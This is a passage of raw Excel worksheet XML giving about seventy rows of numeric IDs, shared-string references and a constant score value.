      </c>
      <c r="C22044" s="2" t="s">
        <v>21286</v>
      </c>
      <c r="D22044" s="2">
        <v>1.0</v>
      </c>
      <c r="E22044" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22044" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22045" ht="15.75" customHeight="1">
      <c r="A22045" s="1">
        <v>10209.0</v>
      </c>
      <c r="B22045" s="2">
        <v>5.7421474E7</v>
      </c>
      <c r="C22045" s="2" t="s">
        <v>21287</v>
      </c>
      <c r="D22045" s="2">
        <v>1.0</v>
      </c>
      <c r="E22045" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22045" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22046" ht="15.75" customHeight="1">
      <c r="A22046" s="1">
        <v>10220.0</v>
      </c>
      <c r="B22046" s="2">
        <v>5.7454641E7</v>
      </c>
      <c r="C22046" s="2" t="s">
        <v>21288</v>
      </c>
      <c r="D22046" s="2">
        <v>1.0</v>
      </c>
      <c r="E22046" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22046" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22047" ht="15.75" customHeight="1">
      <c r="A22047" s="1">
        <v>10234.0</v>
      </c>
      <c r="B22047" s="2">
        <v>5.7491902E7</v>
      </c>
      <c r="C22047" s="2" t="s">
        <v>21289</v>
      </c>
      <c r="D22047" s="2">
        <v>1.0</v>
      </c>
      <c r="E22047" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22047" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22048" ht="15.75" customHeight="1">
      <c r="A22048" s="1">
        <v>10325.0</v>
      </c>
      <c r="B22048" s="2">
        <v>5.7710712E7</v>
      </c>
      <c r="C22048" s="2" t="s">
        <v>21290</v>
      </c>
      <c r="D22048" s="2">
        <v>1.0</v>
      </c>
      <c r="E22048" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22048" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22049" ht="15.75" customHeight="1">
      <c r="A22049" s="1">
        <v>10327.0</v>
      </c>
      <c r="B22049" s="2">
        <v>5.7712777E7</v>
      </c>
      <c r="C22049" s="2" t="s">
        <v>21291</v>
      </c>
      <c r="D22049" s="2">
        <v>1.0</v>
      </c>
      <c r="E22049" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22049" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22050" ht="15.75" customHeight="1">
      <c r="A22050" s="1">
        <v>10351.0</v>
      </c>
      <c r="B22050" s="2">
        <v>6838199.0</v>
      </c>
      <c r="C22050" s="2" t="s">
        <v>21292</v>
      </c>
      <c r="D22050" s="2">
        <v>1.0</v>
      </c>
      <c r="E22050" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22050" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22051" ht="15.75" customHeight="1">
      <c r="A22051" s="1">
        <v>10365.0</v>
      </c>
      <c r="B22051" s="2">
        <v>7803443.0</v>
      </c>
      <c r="C22051" s="2" t="s">
        <v>21293</v>
      </c>
      <c r="D22051" s="2">
        <v>1.0</v>
      </c>
      <c r="E22051" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22051" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22052" ht="15.75" customHeight="1">
      <c r="A22052" s="1">
        <v>10376.0</v>
      </c>
      <c r="B22052" s="2">
        <v>7979788.0</v>
      </c>
      <c r="C22052" s="2" t="s">
        <v>21294</v>
      </c>
      <c r="D22052" s="2">
        <v>1.0</v>
      </c>
      <c r="E22052" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22052" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22053" ht="15.75" customHeight="1">
      <c r="A22053" s="1">
        <v>10400.0</v>
      </c>
      <c r="B22053" s="2">
        <v>9406601.0</v>
      </c>
      <c r="C22053" s="2" t="s">
        <v>21295</v>
      </c>
      <c r="D22053" s="2">
        <v>1.0</v>
      </c>
      <c r="E22053" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22053" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22054" ht="15.75" customHeight="1">
      <c r="A22054" s="1">
        <v>10430.0</v>
      </c>
      <c r="B22054" s="2">
        <v>1.0334645E7</v>
      </c>
      <c r="C22054" s="2" t="s">
        <v>21296</v>
      </c>
      <c r="D22054" s="2">
        <v>1.0</v>
      </c>
      <c r="E22054" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22054" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22055" ht="15.75" customHeight="1">
      <c r="A22055" s="1">
        <v>10439.0</v>
      </c>
      <c r="B22055" s="2">
        <v>1.0392279E7</v>
      </c>
      <c r="C22055" s="2" t="s">
        <v>21297</v>
      </c>
      <c r="D22055" s="2">
        <v>1.0</v>
      </c>
      <c r="E22055" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22055" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22056" ht="15.75" customHeight="1">
      <c r="A22056" s="1">
        <v>10492.0</v>
      </c>
      <c r="B22056" s="2">
        <v>1.1213213E7</v>
      </c>
      <c r="C22056" s="2" t="s">
        <v>21298</v>
      </c>
      <c r="D22056" s="2">
        <v>1.0</v>
      </c>
      <c r="E22056" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22056" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22057" ht="15.75" customHeight="1">
      <c r="A22057" s="1">
        <v>10504.0</v>
      </c>
      <c r="B22057" s="2">
        <v>1.1423041E7</v>
      </c>
      <c r="C22057" s="2" t="s">
        <v>21299</v>
      </c>
      <c r="D22057" s="2">
        <v>1.0</v>
      </c>
      <c r="E22057" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22057" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22058" ht="15.75" customHeight="1">
      <c r="A22058" s="1">
        <v>10626.0</v>
      </c>
      <c r="B22058" s="2">
        <v>1.3846653E7</v>
      </c>
      <c r="C22058" s="2" t="s">
        <v>21300</v>
      </c>
      <c r="D22058" s="2">
        <v>1.0</v>
      </c>
      <c r="E22058" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22058" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22059" ht="15.75" customHeight="1">
      <c r="A22059" s="1">
        <v>10643.0</v>
      </c>
      <c r="B22059" s="2">
        <v>1.4119532E7</v>
      </c>
      <c r="C22059" s="2" t="s">
        <v>21301</v>
      </c>
      <c r="D22059" s="2">
        <v>1.0</v>
      </c>
      <c r="E22059" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22059" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22060" ht="15.75" customHeight="1">
      <c r="A22060" s="1">
        <v>10655.0</v>
      </c>
      <c r="B22060" s="2">
        <v>1.4201393E7</v>
      </c>
      <c r="C22060" s="2" t="s">
        <v>21302</v>
      </c>
      <c r="D22060" s="2">
        <v>1.0</v>
      </c>
      <c r="E22060" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22060" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22061" ht="15.75" customHeight="1">
      <c r="A22061" s="1">
        <v>10733.0</v>
      </c>
      <c r="B22061" s="2">
        <v>1.5298049E7</v>
      </c>
      <c r="C22061" s="2" t="s">
        <v>21303</v>
      </c>
      <c r="D22061" s="2">
        <v>1.0</v>
      </c>
      <c r="E22061" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22061" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22062" ht="15.75" customHeight="1">
      <c r="A22062" s="1">
        <v>10903.0</v>
      </c>
      <c r="B22062" s="2">
        <v>1.6637398E7</v>
      </c>
      <c r="C22062" s="2" t="s">
        <v>21304</v>
      </c>
      <c r="D22062" s="2">
        <v>1.0</v>
      </c>
      <c r="E22062" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22062" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22063" ht="15.75" customHeight="1">
      <c r="A22063" s="1">
        <v>10907.0</v>
      </c>
      <c r="B22063" s="2">
        <v>1.6675889E7</v>
      </c>
      <c r="C22063" s="2" t="s">
        <v>21305</v>
      </c>
      <c r="D22063" s="2">
        <v>1.0</v>
      </c>
      <c r="E22063" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22063" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22064" ht="15.75" customHeight="1">
      <c r="A22064" s="1">
        <v>11030.0</v>
      </c>
      <c r="B22064" s="2">
        <v>1.7964046E7</v>
      </c>
      <c r="C22064" s="2" t="s">
        <v>21306</v>
      </c>
      <c r="D22064" s="2">
        <v>1.0</v>
      </c>
      <c r="E22064" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22064" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22065" ht="15.75" customHeight="1">
      <c r="A22065" s="1">
        <v>11238.0</v>
      </c>
      <c r="B22065" s="2">
        <v>2.0411155E7</v>
      </c>
      <c r="C22065" s="2" t="s">
        <v>21307</v>
      </c>
      <c r="D22065" s="2">
        <v>1.0</v>
      </c>
      <c r="E22065" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22065" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22066" ht="15.75" customHeight="1">
      <c r="A22066" s="1">
        <v>11815.0</v>
      </c>
      <c r="B22066" s="2">
        <v>2.4557981E7</v>
      </c>
      <c r="C22066" s="2" t="s">
        <v>21308</v>
      </c>
      <c r="D22066" s="2">
        <v>1.0</v>
      </c>
      <c r="E22066" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22066" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22067" ht="15.75" customHeight="1">
      <c r="A22067" s="1">
        <v>11895.0</v>
      </c>
      <c r="B22067" s="2">
        <v>2.5169046E7</v>
      </c>
      <c r="C22067" s="2" t="s">
        <v>21309</v>
      </c>
      <c r="D22067" s="2">
        <v>1.0</v>
      </c>
      <c r="E22067" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22067" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22068" ht="15.75" customHeight="1">
      <c r="A22068" s="1">
        <v>11962.0</v>
      </c>
      <c r="B22068" s="2">
        <v>2.5616105E7</v>
      </c>
      <c r="C22068" s="2" t="s">
        <v>21310</v>
      </c>
      <c r="D22068" s="2">
        <v>1.0</v>
      </c>
      <c r="E22068" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22068" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22069" ht="15.75" customHeight="1">
      <c r="A22069" s="1">
        <v>12324.0</v>
      </c>
      <c r="B22069" s="2">
        <v>2.8500733E7</v>
      </c>
      <c r="C22069" s="2" t="s">
        <v>21311</v>
      </c>
      <c r="D22069" s="2">
        <v>1.0</v>
      </c>
      <c r="E22069" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22069" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22070" ht="15.75" customHeight="1">
      <c r="A22070" s="1">
        <v>12413.0</v>
      </c>
      <c r="B22070" s="2">
        <v>2.9107359E7</v>
      </c>
      <c r="C22070" s="2" t="s">
        <v>21312</v>
      </c>
      <c r="D22070" s="2">
        <v>1.0</v>
      </c>
      <c r="E22070" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22070" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22071" ht="15.75" customHeight="1">
      <c r="A22071" s="1">
        <v>12664.0</v>
      </c>
      <c r="B22071" s="2">
        <v>3.0546485E7</v>
      </c>
      <c r="C22071" s="2" t="s">
        <v>21313</v>
      </c>
      <c r="D22071" s="2">
        <v>1.0</v>
      </c>
      <c r="E22071" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22071" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22072" ht="15.75" customHeight="1">
      <c r="A22072" s="1">
        <v>12758.0</v>
      </c>
      <c r="B22072" s="2">
        <v>3.1151792E7</v>
      </c>
      <c r="C22072" s="2" t="s">
        <v>21314</v>
      </c>
      <c r="D22072" s="2">
        <v>1.0</v>
      </c>
      <c r="E22072" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22072" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22073" ht="15.75" customHeight="1">
      <c r="A22073" s="1">
        <v>13094.0</v>
      </c>
      <c r="B22073" s="2">
        <v>3.3465527E7</v>
      </c>
      <c r="C22073" s="2" t="s">
        <v>21315</v>
      </c>
      <c r="D22073" s="2">
        <v>1.0</v>
      </c>
      <c r="E22073" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22073" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22074" ht="15.75" customHeight="1">
      <c r="A22074" s="1">
        <v>13349.0</v>
      </c>
      <c r="B22074" s="2">
        <v>3.4703756E7</v>
      </c>
      <c r="C22074" s="2" t="s">
        <v>21316</v>
      </c>
      <c r="D22074" s="2">
        <v>1.0</v>
      </c>
      <c r="E22074" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22074" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22075" ht="15.75" customHeight="1">
      <c r="A22075" s="1">
        <v>13539.0</v>
      </c>
      <c r="B22075" s="2">
        <v>3.5613044E7</v>
      </c>
      <c r="C22075" s="2" t="s">
        <v>21317</v>
      </c>
      <c r="D22075" s="2">
        <v>1.0</v>
      </c>
      <c r="E22075" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22075" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22076" ht="15.75" customHeight="1">
      <c r="A22076" s="1">
        <v>13591.0</v>
      </c>
      <c r="B22076" s="2">
        <v>3.5752348E7</v>
      </c>
      <c r="C22076" s="2" t="s">
        <v>21318</v>
      </c>
      <c r="D22076" s="2">
        <v>1.0</v>
      </c>
      <c r="E22076" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22076" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22077" ht="15.75" customHeight="1">
      <c r="A22077" s="1">
        <v>14175.0</v>
      </c>
      <c r="B22077" s="2">
        <v>3.8067388E7</v>
      </c>
      <c r="C22077" s="2" t="s">
        <v>21319</v>
      </c>
      <c r="D22077" s="2">
        <v>1.0</v>
      </c>
      <c r="E22077" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22077" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22078" ht="15.75" customHeight="1">
      <c r="A22078" s="1">
        <v>14274.0</v>
      </c>
      <c r="B22078" s="2">
        <v>3.8441704E7</v>
      </c>
      <c r="C22078" s="2" t="s">
        <v>21320</v>
      </c>
      <c r="D22078" s="2">
        <v>1.0</v>
      </c>
      <c r="E22078" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22078" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22079" ht="15.75" customHeight="1">
      <c r="A22079" s="1">
        <v>14474.0</v>
      </c>
      <c r="B22079" s="2">
        <v>3.9522216E7</v>
      </c>
      <c r="C22079" s="2" t="s">
        <v>21321</v>
      </c>
      <c r="D22079" s="2">
        <v>1.0</v>
      </c>
      <c r="E22079" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22079" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22080" ht="15.75" customHeight="1">
      <c r="A22080" s="1">
        <v>14803.0</v>
      </c>
      <c r="B22080" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C22080" s="2" t="s">
        <v>21322</v>
      </c>
      <c r="D22080" s="2">
        <v>1.0</v>
      </c>
      <c r="E22080" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22080" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22081" ht="15.75" customHeight="1">
      <c r="A22081" s="1">
        <v>15143.0</v>
      </c>
      <c r="B22081" s="2">
        <v>4.1930191E7</v>
      </c>
      <c r="C22081" s="2" t="s">
        <v>21323</v>
      </c>
      <c r="D22081" s="2">
        <v>1.0</v>
      </c>
      <c r="E22081" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22081" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22082" ht="15.75" customHeight="1">
      <c r="A22082" s="1">
        <v>15204.0</v>
      </c>
      <c r="B22082" s="2">
        <v>4.2096036E7</v>
      </c>
      <c r="C22082" s="2" t="s">
        <v>21324</v>
      </c>
      <c r="D22082" s="2">
        <v>1.0</v>
      </c>
      <c r="E22082" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22082" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22083" ht="15.75" customHeight="1">
      <c r="A22083" s="1">
        <v>15393.0</v>
      </c>
      <c r="B22083" s="2">
        <v>4.2807649E7</v>
      </c>
      <c r="C22083" s="2" t="s">
        <v>21325</v>
      </c>
      <c r="D22083" s="2">
        <v>1.0</v>
      </c>
      <c r="E22083" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22083" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22084" ht="15.75" customHeight="1">
      <c r="A22084" s="1">
        <v>15460.0</v>
      </c>
      <c r="B22084" s="2">
        <v>4.3090162E7</v>
      </c>
      <c r="C22084" s="2" t="s">
        <v>21326</v>
      </c>
      <c r="D22084" s="2">
        <v>1.0</v>
      </c>
      <c r="E22084" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22084" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22085" ht="15.75" customHeight="1">
      <c r="A22085" s="1">
        <v>15608.0</v>
      </c>
      <c r="B22085" s="2">
        <v>4.3514218E7</v>
      </c>
      <c r="C22085" s="2" t="s">
        <v>21327</v>
      </c>
      <c r="D22085" s="2">
        <v>1.0</v>
      </c>
      <c r="E22085" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22085" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22086" ht="15.75" customHeight="1">
      <c r="A22086" s="1">
        <v>15792.0</v>
      </c>
      <c r="B22086" s="2">
        <v>4.4208931E7</v>
      </c>
      <c r="C22086" s="2" t="s">
        <v>21328</v>
      </c>
      <c r="D22086" s="2">
        <v>1.0</v>
      </c>
      <c r="E22086" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22086" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22087" ht="15.75" customHeight="1">
      <c r="A22087" s="1">
        <v>16100.0</v>
      </c>
      <c r="B22087" s="2">
        <v>4.5398161E7</v>
      </c>
      <c r="C22087" s="2" t="s">
        <v>21329</v>
      </c>
      <c r="D22087" s="2">
        <v>1.0</v>
      </c>
      <c r="E22087" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22087" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22088" ht="15.75" customHeight="1">
      <c r="A22088" s="1">
        <v>16159.0</v>
      </c>
      <c r="B22088" s="2">
        <v>4.5580976E7</v>
      </c>
      <c r="C22088" s="2" t="s">
        <v>21330</v>
      </c>
      <c r="D22088" s="2">
        <v>1.0</v>
      </c>
      <c r="E22088" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22088" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22089" ht="15.75" customHeight="1">
      <c r="A22089" s="1">
        <v>16393.0</v>
      </c>
      <c r="B22089" s="2">
        <v>4.6276094E7</v>
      </c>
      <c r="C22089" s="2" t="s">
        <v>21331</v>
      </c>
      <c r="D22089" s="2">
        <v>1.0</v>
      </c>
      <c r="E22089" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22089" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22090" ht="15.75" customHeight="1">
      <c r="A22090" s="1">
        <v>16615.0</v>
      </c>
      <c r="B22090" s="2">
        <v>4.7063725E7</v>
      </c>
      <c r="C22090" s="2" t="s">
        <v>21332</v>
      </c>
      <c r="D22090" s="2">
        <v>1.0</v>
      </c>
      <c r="E22090" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22090" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22091" ht="15.75" customHeight="1">
      <c r="A22091" s="1">
        <v>16848.0</v>
      </c>
      <c r="B22091" s="2">
        <v>4.7910396E7</v>
      </c>
      <c r="C22091" s="2" t="s">
        <v>21333</v>
      </c>
      <c r="D22091" s="2">
        <v>1.0</v>
      </c>
      <c r="E22091" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22091" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22092" ht="15.75" customHeight="1">
      <c r="A22092" s="1">
        <v>16957.0</v>
      </c>
      <c r="B22092" s="2">
        <v>4.824678E7</v>
      </c>
      <c r="C22092" s="2" t="s">
        <v>21334</v>
      </c>
      <c r="D22092" s="2">
        <v>1.0</v>
      </c>
      <c r="E22092" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22092" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22093" ht="15.75" customHeight="1">
      <c r="A22093" s="1">
        <v>17089.0</v>
      </c>
      <c r="B22093" s="2">
        <v>4.8651416E7</v>
      </c>
      <c r="C22093" s="2" t="s">
        <v>21335</v>
      </c>
      <c r="D22093" s="2">
        <v>1.0</v>
      </c>
      <c r="E22093" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22093" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22094" ht="15.75" customHeight="1">
      <c r="A22094" s="1">
        <v>17105.0</v>
      </c>
      <c r="B22094" s="2">
        <v>4.869804E7</v>
      </c>
      <c r="C22094" s="2" t="s">
        <v>21336</v>
      </c>
      <c r="D22094" s="2">
        <v>1.0</v>
      </c>
      <c r="E22094" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22094" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22095" ht="15.75" customHeight="1">
      <c r="A22095" s="1">
        <v>17181.0</v>
      </c>
      <c r="B22095" s="2">
        <v>4.8905352E7</v>
      </c>
      <c r="C22095" s="2" t="s">
        <v>21337</v>
      </c>
      <c r="D22095" s="2">
        <v>1.0</v>
      </c>
      <c r="E22095" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22095" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22096" ht="15.75" customHeight="1">
      <c r="A22096" s="1">
        <v>17353.0</v>
      </c>
      <c r="B22096" s="2">
        <v>4.943286E7</v>
      </c>
      <c r="C22096" s="2" t="s">
        <v>21338</v>
      </c>
      <c r="D22096" s="2">
        <v>1.0</v>
      </c>
      <c r="E22096" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22096" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22097" ht="15.75" customHeight="1">
      <c r="A22097" s="1">
        <v>17423.0</v>
      </c>
      <c r="B22097" s="2">
        <v>4.9709774E7</v>
      </c>
      <c r="C22097" s="2" t="s">
        <v>21339</v>
      </c>
      <c r="D22097" s="2">
        <v>1.0</v>
      </c>
      <c r="E22097" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22097" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22098" ht="15.75" customHeight="1">
      <c r="A22098" s="1">
        <v>17844.0</v>
      </c>
      <c r="B22098" s="2">
        <v>5.0950893E7</v>
      </c>
      <c r="C22098" s="2" t="s">
        <v>21340</v>
      </c>
      <c r="D22098" s="2">
        <v>1.0</v>
      </c>
      <c r="E22098" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22098" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22099" ht="15.75" customHeight="1">
      <c r="A22099" s="1">
        <v>17853.0</v>
      </c>
      <c r="B22099" s="2">
        <v>5.0984021E7</v>
      </c>
      <c r="C22099" s="2" t="s">
        <v>21341</v>
      </c>
      <c r="D22099" s="2">
        <v>1.0</v>
      </c>
      <c r="E22099" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22099" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22100" ht="15.75" customHeight="1">
      <c r="A22100" s="1">
        <v>18179.0</v>
      </c>
      <c r="B22100" s="2">
        <v>5.1974208E7</v>
      </c>
      <c r="C22100" s="2" t="s">
        <v>21342</v>
      </c>
      <c r="D22100" s="2">
        <v>1.0</v>
      </c>
      <c r="E22100" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22100" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22101" ht="15.75" customHeight="1">
      <c r="A22101" s="1">
        <v>18274.0</v>
      </c>
      <c r="B22101" s="2">
        <v>5.2225363E7</v>
      </c>
      <c r="C22101" s="2" t="s">
        <v>21343</v>
      </c>
      <c r="D22101" s="2">
        <v>1.0</v>
      </c>
      <c r="E22101" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22101" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22102" ht="15.75" customHeight="1">
      <c r="A22102" s="1">
        <v>18327.0</v>
      </c>
      <c r="B22102" s="2">
        <v>5.2407775E7</v>
      </c>
      <c r="C22102" s="2" t="s">
        <v>21344</v>
      </c>
      <c r="D22102" s="2">
        <v>1.0</v>
      </c>
      <c r="E22102" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22102" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22103" ht="15.75" customHeight="1">
      <c r="A22103" s="1">
        <v>18407.0</v>
      </c>
      <c r="B22103" s="2">
        <v>5.2666352E7</v>
      </c>
      <c r="C22103" s="2" t="s">
        <v>21345</v>
      </c>
      <c r="D22103" s="2">
        <v>1.0</v>
      </c>
      <c r="E22103" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22103" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22104" ht="15.75" customHeight="1">
      <c r="A22104" s="1">
        <v>18741.0</v>
      </c>
      <c r="B22104" s="2">
        <v>5.3734486E7</v>
      </c>
      <c r="C22104" s="2" t="s">
        <v>21346</v>
      </c>
      <c r="D22104" s="2">
        <v>1.0</v>
      </c>
      <c r="E22104" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22104" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22105" ht="15.75" customHeight="1">
      <c r="A22105" s="1">
        <v>18750.0</v>
      </c>
      <c r="B22105" s="2">
        <v>5.3783213E7</v>
      </c>
      <c r="C22105" s="2" t="s">
        <v>21347</v>
      </c>
      <c r="D22105" s="2">
        <v>1.0</v>
      </c>
      <c r="E22105" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22105" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22106" ht="15.75" customHeight="1">
      <c r="A22106" s="1">
        <v>18824.0</v>
      </c>
      <c r="B22106" s="2">
        <v>5.3930444E7</v>
      </c>
      <c r="C22106" s="2" t="s">
        <v>21348</v>
      </c>
      <c r="D22106" s="2">
        <v>1.0</v>
      </c>
      <c r="E22106" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22106" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22107" ht="15.75" customHeight="1">
      <c r="A22107" s="1">
        <v>19031.0</v>
      </c>
      <c r="B22107" s="2">
        <v>5.4554983E7</v>
      </c>
      <c r="C22107" s="2" t="s">
        <v>21349</v>
      </c>
      <c r="D22107" s="2">
        <v>1.0</v>
      </c>
      <c r="E22107" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22107" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22108" ht="15.75" customHeight="1">
      <c r="A22108" s="1">
        <v>19444.0</v>
      </c>
      <c r="B22108" s="2">
        <v>5.5717081E7</v>
      </c>
      <c r="C22108" s="2" t="s">
        <v>21350</v>
      </c>
      <c r="D22108" s="2">
        <v>1.0</v>
      </c>
      <c r="E22108" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22108" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22109" ht="15.75" customHeight="1">
      <c r="A22109" s="1">
        <v>19493.0</v>
      </c>
      <c r="B22109" s="2">
        <v>5.5885236E7</v>
      </c>
      <c r="C22109" s="2" t="s">
        <v>21351</v>
      </c>
      <c r="D22109" s="2">
        <v>1.0</v>
      </c>
      <c r="E22109" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22109" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22110" ht="15.75" customHeight="1">
      <c r="A22110" s="1">
        <v>19712.0</v>
      </c>
      <c r="B22110" s="2">
        <v>5.6538503E7</v>
      </c>
      <c r="C22110" s="2" t="s">
        <v>21352</v>
      </c>
      <c r="D22110" s="2">
        <v>1.0</v>
      </c>
      <c r="E22110" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22110" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="22111" ht="15.75" customHeight="1">
      <c r="A22111" s="1">
        <v>19775.0</v>
      </c>
      <c r="B22111" s="2">
        <v>5.6770457E7</v>
